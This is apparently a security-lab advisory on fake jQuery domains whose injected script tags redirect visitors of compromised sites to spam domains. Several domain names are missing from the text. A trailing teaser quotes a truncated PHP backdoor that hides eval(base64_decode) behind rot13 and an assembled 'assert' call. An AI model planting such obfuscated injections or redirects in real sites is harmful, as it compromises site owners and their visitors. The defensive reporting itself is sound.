More Fake jQuery sites –

Labs Note

We keep seeing fake jQuery sites popping up and being used to distributemalware. One was, other was and the new oneis (

And this new one seems to be affecting many web sites in the last few days. All of them have the following on their header or index.php files: = "httx://"

Which redirects any visitor to the web site to where it is then sent to other random spammy domains (seems like a TDS is in place).

Update:We are also seeing some sites with this javascript file being included:, which just redirects back to via the same in javascript.

*Note that the domain was just registered (20-nov-2012), so it is not being flagged anywhere.
**The official jquery sites are or Other variations are likely fake.

You May Also Like

CACHE START Russian Spam

We see quite a few sites with the following injected PHP code: //###=CACHE START=### error_reporting(0); $strings = “as”;$strings .= “sert”; @$strings(str_rot13(‘riny(onfr64_qrpbqr(“nJLtXTymp2I0XPEcLaLcXF…skipped…Tyvqwg9”));’)); //###=CACHE END=### This malware…
Read More